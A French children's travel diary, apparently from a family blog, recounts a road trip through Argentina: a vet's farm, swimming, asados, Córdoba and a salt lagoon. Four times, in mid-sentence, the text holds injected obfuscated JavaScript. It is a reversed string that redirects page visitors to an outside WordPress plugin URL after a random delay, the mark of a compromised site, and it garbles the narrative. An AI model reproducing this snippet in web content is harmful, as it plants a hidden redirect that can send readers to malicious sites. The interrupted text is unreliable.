Le plein de rencontre !

by Clément

vendredi 27 décembre

On a roulé toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la journée. Le soir on a rencontré un vétérinaire qui s’appelle Carlos. Ils nous a emmené dans son pickup voir des veaux et des poissons. IL y avait 400000 poissons et 6000 vaches. Il y avait aussi beaucoup de Yerba Maté.

samedi 28 décembre

Carlos nous a invité dans sa maison. On s’est baigné dans sa piscine, il y avait une parti ou j’avais pieds et une parti où je n’avais pas pied. On a mangé une bonne viande que Carlos avait préparé en Asado (bbq).

En partant il nous a donné plein de viande et un paquet entier de Yerba Maté et une bouteille de vin pétillant pour les parents. On est trés content de l’avoir rencontré car il est trés gentil.

Dimanche 29 décembre

On s’est baigné dans un rio où  il y avait beaucoup de courant, l’eau était trés chaude.

Lundi 30 décembre

On a roulé toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le matin. On a visité Santa Fé et le soir on s’est baigné dans une piscine.

Mercredi 1er janvier

On a piqueniqué dans un village qui s’appelle La Francia !

Jeudi 2 janvier

On a visité Cordoba. C’est la deuxième plus grande ville d’Argentine. On a pris 2 taxi qui conduisaient trés mal dont un qui prenait les ronds points à l’envers !!!!

Mardi 7 Janvier

On a passé les derniers jours chez une famille Argentine avec deux jumeaux de 12 ans (Quentin, Alma). J’ai beaucoup joué avec Quentin (ça se prononce Kinnetinne). Les parents sont des artistes (jongleurs, échasse, sculptures,…). L’avant dernier jour on a fait une partie de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touche toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touche avec Quentin, Alma, Alice et un autre garçon. Et j’ai fait une feinte pour gagner. Quentin m’a un peu appris à jongler.

Mercredi 8 janvier, Argentine Guatrache.

On a vu une lagune salée asséchée, c’était vraiment très beau et le gout du sel est vraiment très salé

On était dans un camping avec une super piscine. Avec Alice, dans la lagune , on a vu des trucs qui ressemblaient à des animaux blancs. Du coup on est allé voir. Mais on s’est rendu compte qu’on encaissait de plus en plus dans le sable émouvant.

Dans l’aprés-midi, on roulait et un camion qui roulait très vite nous a frôlé et a fait s’envolé notre lanterneau. Du coup on est allé dans une menuiserie. Le chef a réparé le lanterneau gratuitement et après il nous a invité chez lui pour dîner un asado. J’ai rencontré son fils, Martin. On a joué au foot et à la Play (foot).